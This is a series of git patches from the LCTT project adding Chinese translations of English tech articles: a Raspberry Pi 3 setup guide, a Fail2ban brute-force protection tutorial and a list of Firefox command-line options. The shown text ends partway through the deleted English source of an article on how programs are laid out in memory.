+一定要确保选择了 SD 卡的根目录,在我的案例中(在 MacOS 上),它是:
`rsync -avzP /Users/swapnil/Downloads/NOOBS_v2_2_0/ /Volumes/U/`
-Or you can copy and paste the content. Just make sure that all the files inside the NOOBS directory are copied into the root directory of the Micro SD Card and not inside any sub-directory.
+或者你也可以拷贝粘贴 NOOBS 目录中的内容。一定要确保将 NOOBS 目录中的内容全部拷贝到 Micro SD 卡的根目录下,千万不能放到任何的子目录中。
-Now plug the Micro SD Card into the Raspberry Pi 3, connect the monitor, the keyboard and power supply. If you do have wired network, I recommend using it as you will get faster download speed to download and install the base operating system. The device will boot into NOOBS that offers a couple of distributions to install. Choose Raspbian from the first option and follow the on-screen instructions.
+现在可以插入这张 Micro SD 卡到树莓派 3 中,连接好显示器、键盘鼠标和电源适配器。如果你拥有有线网络,我建议你使用它,因为有线网络下载和安装操作系统更快。树莓派将引导到 NOOBS,它将提供一个供你去选择安装的分发版列表。从第一个选项中选择树莓派,紧接着会出现如下图的画面。
![raspi config][6] Swapnil Bhartiya
-Once the installation is complete, Pi will reboot, and you will be greeted with Raspbian. Now it's time to configure it and run system updates. In most cases, we use Raspberry Pi in headless mode and manage it remotely over the networking using SSH. Which means you don't have to plug in a monitor or keyboard to manage your Pi.
+在你安装完成后,树莓派将重新启动,你将会看到一个欢迎使用树莓派的画面。现在可以去配置它,并且去运行系统更新。大多数情况下,我们都是在没有外设的情况下使用树莓派的,都是使用 SSH 基于网络远程去管理它。这意味着你不需要为了管理树莓派而去为它接上鼠标键盘和显示器。
-First of all, we need to configure the network if you are using Wi-Fi. Click on the network icon on the top panel, and select the network from the list and provide it with the password.
+开始使用它的第一步是,配置网络(假如你使用的是 Wi-Fi)。点击顶部面板上的网络图标,然后在出现的网络列表中,选择你要配置的网络并为它输入正确的密码。
![wireless][7] Swapnil Bhartiya
-Congrats, you are connected wirelessly. Before we proceed with the next step, we need to find the IP address of the device so we can manage it remotely.
+恭喜您,无线网络的连接配置完成了。在进入下一步的配置之前,你需要找到你的网络为树莓派分配的 IP 地址,因为远程管理会用到它。
-Open Terminal and run this command:
+打开一个终端,运行如下的命令:
`ifconfig`
-Now, note down the IP address of the device in the wlan0 section. It should be listed as "inet addr."
+现在,记下这个设备的 wlan0 部分的 IP 地址。它一般显示为 “inet addr”
-Now it's time to enable SSH and configure the system. Open the terminal on Pi and open raspi-config tool.
+现在,可以去启用 SSH 了,在树莓派上打开一个终端,然后打开 raspi-config 工具。
`sudo raspi-config`
-The default user and password for Raspberry Pi is "pi" and "raspberry" respectively. You'll need the password for the above command. The first option of Raspi Config tool is to change the default password, and I heavily recommend changing the password, especially if you want to use it over the network.
+树莓派的默认用户名和密码分别是 “pi” 和 “raspberry”。在上面的命令中你会被要求输入密码。树莓派配置工具的第一个选项是去修改默认密码,我强烈推荐你修改默认密码,尤其是你基于网络去使用它的时候。
-The second option is to change the hostname, which can be useful if you have more than one Pi on the network. A hostname makes it easier to identify each device on the network.
+第二个选项是去修改主机名,如果在你的网络中有多个树莓派时,主机名用于区分它们。一个有意义的主机名可以很容易在网络上识别每个设备。
-Then go to Interfacing Options and enable Camera, SSH, and VNC. If you're using the device for an application that involves multimedia, such as a home theater system or PC, then you may also want to change the audio output option. By default the output is set to HDMI, but if you're using external speakers, you need to change the set-up. Go to the Advanced Option tab of Raspi Config tool, and go to Audio. There choose 3.5mm as the default out.
+然后进入到接口选项,去启用摄像头、SSH、以及 VNC。如果你在树莓派上使用了一个涉及到多媒体的应用程序,比如,家庭影院系统或者 PC,你也可以去改变音频输出选项。缺省情况下,它的默认输出到 HDMI 接口,但是,如果你使用外部音响,你需要去改变音频输出设置。转到树莓派配置工具的高级配置选项,选择音频,然后选择 3.5mm 作为默认输出。
-[Tip: Use arrow keys to navigate and then Enter key to choose. ]
+[小提示:使用箭头键去导航,使用回车键去选择]
-Once all these changes are applied, the Pi will reboot. You can unplug the monitor and keyboard from your Pi as we will be managing it over the network. Now open Terminal on your local machine. If you're on Windows, you can use Putty or read my article to install Ubuntu Bash on Windows 10.
+一旦所有的改变被应用, 树莓派将要求重新启动。你可以从树莓派上拔出显示器、鼠标键盘,以后可以通过网络来管理它。现在可以在你的本地电脑上打开终端。如果你使用的是 Windows,你可以使用 Putty 或者去读我的文章 - 怎么在 Windows 10 上安装 Ubuntu Bash。
-Then ssh into your system:
+在你的本地电脑上输入如下的 SSH 命令:
`ssh pi@IP_ADDRESS_OF_Pi`
-In my case it was:
+在我的电脑上,这个命令是这样的:
`ssh pi@10.0.0.161`
-Provide it with the password and Eureka!, you are logged into your Pi and can now manage the device from a remote machine. If you want to manage your Raspberry Pi over the Internet, read my article on [enabling RealVNC on your machine][8].
+输入它的密码,你登入到树莓派了!现在你可以从一台远程电脑上去管理你的树莓派。如果你希望通过因特网去管理树莓派,可以去阅读我的文章 - [如何在你的计算机上启用 RealVNC][8]。
-In the next follow-up article, I will talk about using Raspberry Pi to manage your 3D printer remotely.
+在该系列的下一篇文章中,我将讲解使用你的树莓派去远程管理你的 3D 打印机。
-**This article is published as part of the IDG Contributor Network.[Want to Join?][9]**
+**这篇文章是作为 IDG 投稿网络的一部分发表的。[想加入吗?][9]**
--------------------------------------------------------------------------------
via: https://www.infoworld.com/article/3176488/linux/a-beginner-s-guide-to-raspberry-pi-3.html
作者:[Swapnil Bhartiya][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[qhwdw](https://github.com/qhwdw)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 2ff11dc5b77ed2b31fedc56d713f46b315865b3a Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 11:13:39 +0800
Subject: [PATCH 230/371] Translating by qhwdw
---
sources/tech/20090127 Anatomy of a Program in Memory.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
index fff0818491..56979709bb 100644
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ b/sources/tech/20090127 Anatomy of a Program in Memory.md
@@ -1,3 +1,4 @@
+Translating by qhwdw
Anatomy of a Program in Memory
============================================================
From 5f54d1eedc784fc4c2045e3190a8caa8ad7ca3c1 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 11:37:50 +0800
Subject: [PATCH 231/371] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=88=90-/2?=
=?UTF-8?q?0171107=20How=20To=20Protect=20Server=20Against=20Brute=20Force?=
=?UTF-8?q?=20Attacks=20With=20Fail2ban=20On=20Linux.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...te Force Attacks With Fail2ban On Linux.md | 101 ++++++++----------
1 file changed, 47 insertions(+), 54 deletions(-)
rename {sources => translated}/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md (57%)
diff --git a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md b/translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
similarity index 57%
rename from sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
rename to translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
index 55e7a7d17a..1d90ea333c 100644
--- a/sources/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
+++ b/translated/tech/20171107 How To Protect Server Against Brute Force Attacks With Fail2ban On Linux.md
@@ -1,67 +1,65 @@
-translating by Flowsnow
-
-How To Protect Server Against Brute Force Attacks With Fail2ban On Linux
+如何在Linux上用Fail2ban保护服务器免受暴力攻击
======
-One of the important task for Linux administrator is to protect server against illegitimate attack or access. By default Linux system comes with well-configured firewall such as Iptables, Uncomplicated Firewall (UFW), ConfigServer Security Firewall (CSF), etc, which will prevent many kinds of attacks.
+Linux管理员的一个重要任务是保护服务器免受非法攻击或访问。 默认情况下,Linux系统带有配置良好的防火墙,比如Iptables,Uncomplicated Firewall(UFW),ConfigServer Security Firewall(CSF)等,可以防止多种攻击。
-Any machine which is connected to the internet is a potential target for malicious attacks. There is a tool called fail2ban is available to mitigate illegitimate access on server.
+任何连接到互联网的机器都是恶意攻击的潜在目标。 有一个名为fail2ban的工具可用来缓解服务器上的非法访问。
-### What Is Fail2ban?
+### 什么是Fail2ban?
-[Fail2ban][1] is an intrusion prevention software, framework which protect server against brute force attacks. It's Written in Python programming language. Fail2ban work based on auth log files, by default it will scan the auth log files such as `/var/log/auth.log`, `/var/log/apache/access.log`, etc.. and bans IPs that show the malicious signs, too many password failures, seeking for exploits, etc.
+[Fail2ban][1]是一款入侵防御软件,可以保护服务器免受暴力攻击。 它是用Python编程语言编写的。 Fail2ban基于auth日志文件工作,默认情况下它会扫描所有auth日志文件,如`/var/log/auth.log`,`/var/log/apache/access.log`等,并禁止带有恶意标志的IP,比如密码失败太多,寻找漏洞等等标志。
-Generally fail2Ban is used to update firewall rules to reject the IP addresses for a specified amount of time. Also it will send mail notification too. Fail2Ban comes with many filters for various services such as ssh, apache, nginx, squid, named, mysql, nagios, etc,.
+通常,fail2Ban用于更新防火墙规则,用于在指定的时间内拒绝IP地址。 它也会发送邮件通知。 Fail2Ban为各种服务提供了许多过滤器,如ssh,apache,nginx,squid,named,mysql,nagios等。
-Fail2Ban is able to reduce the rate of incorrect authentications attempts however it cannot eliminate the risk that weak authentication presents. this is one of the security for server which will prevent brute force attacks.
+Fail2Ban能够降低错误认证尝试的速度,但是它不能消除弱认证带来的风险。 这只是服务器防止暴力攻击的安全手段之一。
-### How to Install Fail2ban In Linux
+### 如何在Linux中安装Fail2ban
-Fail2ban is already packaged with most of the Linux distribution so, just use you distribution package manager to install it.
+Fail2ban已经与大部分Linux发行版打包在一起了,所以只需使用你的发行包版的包管理器来安装它。
+
+对于**`Debian / Ubuntu`**,使用[APT-GET命令][2]或[APT命令][3]安装。
-For **`Debian/Ubuntu`** , use [APT-GET Command][2] or [APT Command][3] to install tilda.
```
$ sudo apt install fail2ban
-
```
-For **`Fedora`** , use [DNF Command][4] to install tilda.
+对于**`Fedora`**,使用[DNF命令][4]安装。
+
```
$ sudo dnf install fail2ban
-
```
-For **`CentOS/RHEL`** systems, enable [EPEL Repository][5] or [RPMForge Repository][6] and use [YUM Command][7] to install Terminator.
+对于 **`CentOS/RHEL`**,启用[EPEL库][5]或[RPMForge][6]库,使用[YUM命令][7]安装。
+
```
$ sudo yum install fail2ban
-
```
-For **`Arch Linux`** , use [Pacman Command][8] to install tilda.
+对于**`Arch Linux`**,使用[Pacman命令][8]安装。
+
```
$ sudo pacman -S fail2ban
-
```
-For **`openSUSE`** , use [Zypper Command][9] to install tilda.
+对于 **`openSUSE`** , 使用[Zypper命令][9]安装.
```
$ sudo zypper in fail2ban
-
```
-### How To Configure Fail2ban
+### 如何配置Fail2ban
-By default Fail2ban keeps all the configuration files in `/etc/fail2ban/` directory. The main configuration file is `jail.conf`, it contains a set of pre-defined filters. So, don't edit the file and it's not advisable because whenever new update comes the configuration get reset to default.
+默认情况下,Fail2ban将所有配置文件保存在`/etc/fail2ban/` 目录中。 主配置文件是`jail.conf`,它包含一组预定义的过滤器。 所以,不要编辑文件,这是不可取的,因为只要有新的更新配置就会重置为默认值。
+
+只需在同一目录下创建一个名为`jail.local`的新配置文件,并根据您的意愿进行修改。
-Just create a new configuration file called `jail.local` in the same directory and modify as per your wish.
```
# cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
-
```
-By default most of the option was configured perfectly and if you want to enable access to any particular IP then you can add the IP address into `ignoreip` area, for more then one IP give a speace between the IP address.
+默认情况下,大多数选项都已经配置的很完美了,如果要启用对任何特定IP的访问,则可以将IP地址添加到`ignoreip` 区域,对于多个ip的情况,用空格隔开ip地址。
+
+配置文件中的`DEFAULT`部分包含Fail2Ban遵循的基本规则集,您可以根据自己的意愿调整任何参数。
-The `DEFAULT` section contains the basic set of rules that Fail2Ban follow and you can adjust any parameter as per your wish.
```
# nano /etc/fail2ban/jail.local
@@ -71,19 +69,19 @@ bantime = 600
findtime = 600
maxretry = 3
destemail = 2daygeek@gmail.com
-
```
- * **ignoreip :** This section allow us to whitelist the list of IP address and Fail2ban will not ban a host which matches an address in this list
- * **bantime :** The number of seconds that a host is banned
- * **findtime :** A host is banned if it has generated "maxretry" during the last "findtime" seconds
- * **maxretry :** "maxretry" is the number of failures before a host get banned.
+ * **ignoreip:**本部分允许我们列出IP地址列表,Fail2ban不会禁止与列表中的地址匹配的主机
+* **bantime:**主机被禁止的秒数
+* **findtime:**如果在上次“findtime”秒期间已经发生了“maxretry”次重试,则主机会被禁止
+* **maxretry:**“maxretry”是主机被禁止之前的失败次数
-### How To Configure Service
+### 如何配置服务
+
+Fail2ban带有一组预定义的过滤器,用于各种服务,如ssh,apache,nginx,squid,named,mysql,nagios等。 我们不希望对配置文件进行任何更改,只需在服务区域中添加`enabled = true`这一行就可以启用任何服务。 禁用服务时将true改为false即可。
-Fail2ban comes with set of pre-defined filters for various servicess such as ssh, apache, nginx, squid, named, mysql, nagios, etc,. We don't want to make any changes on configuration file and just add following line `enabled = true` in the service area to enable jail to any services. To disable make the line to `false` instead of ture.
```
# SSH servers
[sshd]
@@ -91,31 +89,29 @@ enabled = true
port = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
-
```
- * **enabled :** Determines whether the service is turned on or off.
- * **port :** It's refering to the particular service. If using the default port, then the service name can be placed here. If using a non-traditional port, this should be the port number.
- * **logpath :** Gives the location of the service's logs./li>
- * **backend :** "backend" specifies the backend used to get files modification.
+ * **enabled:** 确定服务是打开还是关闭。
+* **port :**指的是特定的服务。 如果使用默认端口,则服务名称可以放在这里。 如果使用非传统端口,则应该是端口号。
+* **logpath:**提供服务日志的位置
+* **backend:**“后端”指定用于获取文件修改的后端。
-### Restart Fail2Ban
+### 重启Fail2Ban
-After making changes restart Fail2Ban to take effect.
+进行更改后,重新启动Fail2Ban才能生效。
```
[For SysVinit Systems]
# service fail2ban restart
[For systemd Systems]
# systemctl restart fail2ban.service
-
```
-### Verify Fail2Ban iptables rules
+### 验证Fail2Ban iptables规则
-You can confirm whether Fail2Ban iptables rules are added into firewall using below command.
+你可以使用下面的命令来确认是否在防火墙中成功添加了Fail2Ban iptables规则。
```
# iptables -L
Chain INPUT (policy ACCEPT)
@@ -139,9 +135,10 @@ target prot opt source destination
RETURN all -- anywhere anywhere
```
-### How To Test Fail2ban
+### 如何测试Fail2ban
+
+我做了一些失败的尝试来测试这个。 为了证实这一点,我要验证`/var/log/fail2ban.log` 文件。
-I have made some failed attempts to test this. To confirm this, I'm going to verify the `/var/log/fail2ban.log` file.
```
2017-11-05 14:43:22,901 fail2ban.server [7141]: INFO Changed logging target to /var/log/fail2ban.log for Fail2ban v0.9.6
2017-11-05 14:43:22,987 fail2ban.database [7141]: INFO Connected to fail2ban persistent database '/var/lib/fail2ban/fail2ban.sqlite3'
@@ -184,19 +181,17 @@ I have made some failed attempts to test this. To confirm this, I'm going to ver
2017-11-05 15:20:12,276 fail2ban.filter [8528]: INFO [sshd] Found 103.5.134.167
2017-11-05 15:20:12,380 fail2ban.actions [8528]: NOTICE [sshd] Ban 103.5.134.167
2017-11-05 15:21:12,659 fail2ban.actions [8528]: NOTICE [sshd] Unban 103.5.134.167
-
```
-To Check list of jail enabled, run the following command.
+要查看启用的监狱列表,请运行以下命令。
```
# fail2ban-client status
Status
|- Number of jail: 2
`- Jail list: apache-auth, sshd
-
```
-To get the blocked Ip address by running following command.
+通过运行以下命令来获取禁止的IP地址。
```
# fail2ban-client status ssh
Status for the jail: ssh
@@ -208,13 +203,11 @@ Status for the jail: ssh
|- Currently banned: 1
| `- IP list: 192.168.1.115
`- Total banned: 1
-
```
-To remove blocked IP address from Fail2Ban, run the following command.
+要从Fail2Ban中删除禁止的IP地址,请运行以下命令。
```
# fail2ban-client set ssh unbanip 192.168.1.115
-
```
--------------------------------------------------------------------------------
@@ -222,7 +215,7 @@ To remove blocked IP address from Fail2Ban, run the following command.
via: https://www.2daygeek.com/how-to-install-setup-configure-fail2ban-on-linux/#
作者:[Magesh Maruthamuthu][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[Flowsnow](https://github.com/Flowsnow)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From e215356c4ad11c1684a613ed07093e1b6d4674cb Mon Sep 17 00:00:00 2001
From: hopefully2333 <787016457@qq.com>
Date: Thu, 11 Jan 2018 11:43:01 +0800
Subject: [PATCH 232/371] Update 20180106 Meltdown and Spectre Linux Kernel
Status.md
---
.../tech/20180106 Meltdown and Spectre Linux Kernel Status.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
index 1ade61bd3a..d98fddad78 100644
--- a/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
+++ b/sources/tech/20180106 Meltdown and Spectre Linux Kernel Status.md
@@ -1,3 +1,5 @@
+translated by hopefully2333
+
Meltdown and Spectre Linux Kernel Status
============================================================
From e7d2f183a73dce5060c734576863095bfc2ba146 Mon Sep 17 00:00:00 2001
From: syys96 <3359652182@qq.com>
Date: Wed, 10 Jan 2018 23:26:28 -0500
Subject: [PATCH 233/371] Update 20170123 New Years resolution Donate to 1 free
software project every month.md
---
... resolution Donate to 1 free software project every month.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
index d2e2b5f5c1..53ee20dbd3 100644
--- a/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
+++ b/sources/tech/20170123 New Years resolution Donate to 1 free software project every month.md
@@ -1,3 +1,5 @@
+Translating by syys96
+
New Year’s resolution: Donate to 1 free software project every month
============================================================
From 427289a40bcdbb324a855b68f06e956bec951d11 Mon Sep 17 00:00:00 2001
From: Flowsnow
Date: Thu, 11 Jan 2018 13:51:31 +0800
Subject: [PATCH 234/371] =?UTF-8?q?=E7=94=B3=E8=AF=B7=E7=BF=BB=E8=AF=91-20?=
=?UTF-8?q?170919=20What=20Are=20Bitcoins.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20170919 What Are Bitcoins.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/sources/tech/20170919 What Are Bitcoins.md b/sources/tech/20170919 What Are Bitcoins.md
index 35ff986891..c61b32b76a 100644
--- a/sources/tech/20170919 What Are Bitcoins.md
+++ b/sources/tech/20170919 What Are Bitcoins.md
@@ -1,7 +1,10 @@
+translating by Flowsnow
+
What Are Bitcoins?
======
+
![what are bitcoins](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/what-are-bitcoins_orig.jpg)
-
+
**[Bitcoin][1]** is a digital currency or electronic cash the relies on peer to peer technology for completing transactions. Since peer to peer technology is used as the major network, bitcoins provide a community like managed economy. This is to mean, bitcoins eliminate the centralized authority way of managing currency and promotes community management of currency. Most Also of the software related to bitcoin mining and managing of bitcoin digital cash is open source.
The first Bitcoin software was developed by Satoshi Nakamoto and it's based on open source cryptographic protocol. Bitcoins smallest unit is known as the Satoshi which is basically one-hundredth millionth of a single bitcoin (0.00000001 BTC).
From ca9f406cb9f2a919836dd3330cd4d7fb0e42dc10 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 14:20:44 +0800
Subject: [PATCH 235/371] translate done: 20171008 The most important Firefox
command line options.md
---
... important Firefox command line options.md | 61 -------------------
... important Firefox command line options.md | 58 ++++++++++++++++++
2 files changed, 58 insertions(+), 61 deletions(-)
delete mode 100644 sources/tech/20171008 The most important Firefox command line options.md
create mode 100644 translated/tech/20171008 The most important Firefox command line options.md
diff --git a/sources/tech/20171008 The most important Firefox command line options.md b/sources/tech/20171008 The most important Firefox command line options.md
deleted file mode 100644
index 8190be8340..0000000000
--- a/sources/tech/20171008 The most important Firefox command line options.md
+++ /dev/null
@@ -1,61 +0,0 @@
-translating by lujun9972
-The most important Firefox command line options
-======
-The Firefox web browser supports a number of command line options that it can be run with to customize startup of the web browser.
-
-You may have come upon some of them in the past, for instance the command -P "profile name" to start the browser with the specified profile, or -private to start a new private browsing session.
-
-The following guide lists important command line options for Firefox. It is not a complete list of all available options, as many are used only for specific purposes that have little to no value to users of the browser.
-
-You find the [complete][1] listing of command line options on the Firefox Developer website. Note that many of the command line options work in other Mozilla-based products, even third-party programs, as well.
-
-### Important Firefox command line options
-
-![firefox command line][2]
-
- **Profile specific options**
-
- * **-CreateProfile profile name** -- This creates a new user profile, but won't start it right away.
- * **-CreateProfile "profile name profile dir"** -- Same as above, but will specify a custom profile directory on top of that.
- * **-ProfileManager** , or **-P** -- Opens the built-in profile manager.
- * - **P "profile name"** -- Starts Firefox with the specified profile. Profile manager is opened if the specified profile does not exist. Works only if no other instance of Firefox is running.
- * **-no-remote** -- Add this to the -P commands to create a new instance of the browser. This lets you run multiple profiles at the same time.
-
-
-
- **Browser specific options**
-
- * **-headless** -- Start Firefox in headless mode. Requires Firefox 55 on Linux, Firefox 56 on Windows and Mac OS X.
- * **-new-tab URL** -- loads the specified URL in a new tab in Firefox.
- * **-new-window URL** -- loads the specified URL in a new Firefox window.
- * **-private** -- Launches Firefox in private browsing mode. Can be used to run Firefox in private browsing mode all the time.
- * **-private-window** -- Open a private window.
- * **-private-window URL** -- Open the URL in a new private window. If a private browsing window is open already, open the URL in that window instead.
- * **-search term** -- Run the search using the default Firefox search engine.
- * - **url URL** -- Load the URL in a new tab or window. Can be run without -url, and multiple URLs separated by space can be opened using the command.
-
-
-
-Other options
-
- * **-safe-mode** -- Starts Firefox in Safe Mode. You may also hold down the Shift-key while opening Firefox to start the browser in Safe Mode.
- * **-devtools** -- Start Firefox with Developer Tools loaded and open.
- * **-inspector URL** -- Inspect the specified address in the DOM Inspector.
- * **-jsconsole** -- Start Firefox with the Browser Console.
- * **-tray** -- Start Firefox minimized.
-
-
-
-
---------------------------------------------------------------------------------
-
-via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
-
-作者:[Martin Brinkmann][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.ghacks.net/author/martin/
-[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
diff --git a/translated/tech/20171008 The most important Firefox command line options.md b/translated/tech/20171008 The most important Firefox command line options.md
new file mode 100644
index 0000000000..14daac06cb
--- /dev/null
+++ b/translated/tech/20171008 The most important Firefox command line options.md
@@ -0,0 +1,58 @@
+最重要的 Firefox 命令行选项
+======
+Firefox web 浏览器支持很多命令行选项,可以定制它启动的方式。
+
+你可能已经接触过一些了,比如 `-P "profile name"` 指定浏览器启动加载时的配置文件,`-private` 开启一个私有会话。
+
+本指南会列出对 FIrefox 来说比较重要的那些命令行选项。它并不包含所有的可选项,因为很多选项只用于特定的目的,对一般用户来说没什么价值。
+
+你可以在 Firefox 开发者网站上看到[完整 ][1] 的命令行选项。需要注意的是,很多命令行选项对其他基于 Mozilla 的产品一样有效,甚至对某些第三方的程序也有效。
+
+### 重要的 Firefox 命令行选项
+
+![firefox command line][2]
+
+#### Profile 相关选项
+
+ + **-CreateProfile profile 名称** -- 创建新的用户配置信息,但并不立即使用它。
+ + **-CreateProfile "profile 名 存放 profile 的目录"** -- 跟上面一样,只是指定了存放 profile 的目录。
+ + **-ProfileManager**,或 **-P** -- 打开内置的 profile 管理器。
+ + - **P "profile 名"** -- 使用 n 指定的 profile 启动 Firefox。若指定的 profile 不存在则会打开 profile 管理器。只有在没有其他 Firefox 实例运行时才有用。
+ + **-no-remote** -- 与 `-P` 连用来创建新的浏览器实例。它允许你在同一时间运行多个 profile。
+
+#### 浏览器相关选项
+
+ + **-headless** -- 以无头模式启动 Firefox。Linux 上需要 Firefox 55 才支持,Windows 和 Mac OS X 上需要 Firefox 56 才支持。
+ + **-new-tab URL** -- 在 Firefox 的新标签页中加载指定 URL。
+ + **-new-window URL** -- 在 Firefox 的新窗口中加载指定 URL。
+ + **-private** -- 以私隐私浏览模式启动 Firefox。可以用来让 Firefox 始终运行在隐私浏览模式下。
+ + **-private-window** -- 打开一个隐私窗口
+ + **-private-window URL** -- 在新的隐私窗口中打开 URL。若已经打开了一个隐私浏览窗口,则在那个窗口中打开 URL。
+ + **-search 单词** -- 使用 FIrefox 默认的搜索引擎进行搜索。
+ + - **url URL** -- 在新的标签也或窗口中加载 URL。可以省略这里的 `-url`,而且支持打开多个 URL,每个 URL 之间用空格分离。
+
+
+
+#### 其他 options
+
+ + **-safe-mode** -- 在安全模式下启动 Firefox。在启动 Firefox 时一直按住 Shift 键也能进入安全模式。
+ + **-devtools** -- 启动 Firefox,同时加载并打开 Developer Tools。
+ + **-inspector URL** -- 使用 DOM Inspector 查看指定的 URL
+ + **-jsconsole** -- 启动 Firefox,同时打开 Browser Console。
+ + **-tray** -- 启动 Firefox,但保持最小化。
+
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ghacks.net/2017/10/08/the-most-important-firefox-command-line-options/
+
+作者:[Martin Brinkmann][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ghacks.net/author/martin/
+[1]:https://developer.mozilla.org/en-US/docs/Mozilla/Command_Line_Options
From 66700a9c745e853eb8a0be859d251ccba868d90b Mon Sep 17 00:00:00 2001
From: qhwdw
Date: Thu, 11 Jan 2018 14:51:45 +0800
Subject: [PATCH 236/371] Translated by qhwdw
---
...20090127 Anatomy of a Program in Memory.md | 85 -------------------
...20090127 Anatomy of a Program in Memory.md | 84 ++++++++++++++++++
2 files changed, 84 insertions(+), 85 deletions(-)
delete mode 100644 sources/tech/20090127 Anatomy of a Program in Memory.md
create mode 100644 translated/tech/20090127 Anatomy of a Program in Memory.md
diff --git a/sources/tech/20090127 Anatomy of a Program in Memory.md b/sources/tech/20090127 Anatomy of a Program in Memory.md
deleted file mode 100644
index 56979709bb..0000000000
--- a/sources/tech/20090127 Anatomy of a Program in Memory.md
+++ /dev/null
@@ -1,85 +0,0 @@
-Translating by qhwdw
-Anatomy of a Program in Memory
-============================================================
-
-Memory management is the heart of operating systems; it is crucial for both programming and system administration. In the next few posts I’ll cover memory with an eye towards practical aspects, but without shying away from internals. While the concepts are generic, examples are mostly from Linux and Windows on 32-bit x86\. This first post describes how programs are laid out in memory.
-
-Each process in a multi-tasking OS runs in its own memory sandbox. This sandbox is the virtual address space, which in 32-bit mode is always a 4GB block of memory addresses. These virtual addresses are mapped to physical memory by page tables, which are maintained by the operating system kernel and consulted by the processor. Each process has its own set of page tables, but there is a catch. Once virtual addresses are enabled, they apply to _all software_ running in the machine, _including the kernel itself_ . Thus a portion of the virtual address space must be reserved to the kernel:
-
-![Kernel/User Memory Split](http://static.duartes.org/img/blogPosts/kernelUserMemorySplit.png)
-
-This does not mean the kernel uses that much physical memory, only that it has that portion of address space available to map whatever physical memory it wishes. Kernel space is flagged in the page tables as exclusive to [privileged code][1] (ring 2 or lower), hence a page fault is triggered if user-mode programs try to touch it. In Linux, kernel space is constantly present and maps the same physical memory in all processes. Kernel code and data are always addressable, ready to handle interrupts or system calls at any time. By contrast, the mapping for the user-mode portion of the address space changes whenever a process switch happens:
-
-![Process Switch Effects on Virtual Memory](http://static.duartes.org/img/blogPosts/virtualMemoryInProcessSwitch.png)
-
-Blue regions represent virtual addresses that are mapped to physical memory, whereas white regions are unmapped. In the example above, Firefox has used far more of its virtual address space due to its legendary memory hunger. The distinct bands in the address space correspond to memory segments like the heap, stack, and so on. Keep in mind these segments are simply a range of memory addresses and _have nothing to do_ with [Intel-style segments][2]. Anyway, here is the standard segment layout in a Linux process:
-
-![Flexible Process Address Space Layout In Linux](http://static.duartes.org/img/blogPosts/linuxFlexibleAddressSpaceLayout.png)
-
-When computing was happy and safe and cuddly, the starting virtual addresses for the segments shown above were exactly the same for nearly every process in a machine. This made it easy to exploit security vulnerabilities remotely. An exploit often needs to reference absolute memory locations: an address on the stack, the address for a library function, etc. Remote attackers must choose this location blindly, counting on the fact that address spaces are all the same. When they are, people get pwned. Thus address space randomization has become popular. Linux randomizes the [stack][3], [memory mapping segment][4], and [heap][5] by adding offsets to their starting addresses. Unfortunately the 32-bit address space is pretty tight, leaving little room for randomization and [hampering its effectiveness][6].
-
-The topmost segment in the process address space is the stack, which stores local variables and function parameters in most programming languages. Calling a method or function pushes a new stack frame onto the stack. The stack frame is destroyed when the function returns. This simple design, possible because the data obeys strict [LIFO][7] order, means that no complex data structure is needed to track stack contents – a simple pointer to the top of the stack will do. Pushing and popping are thus very fast and deterministic. Also, the constant reuse of stack regions tends to keep active stack memory in the [cpu caches][8], speeding up access. Each thread in a process gets its own stack.
-
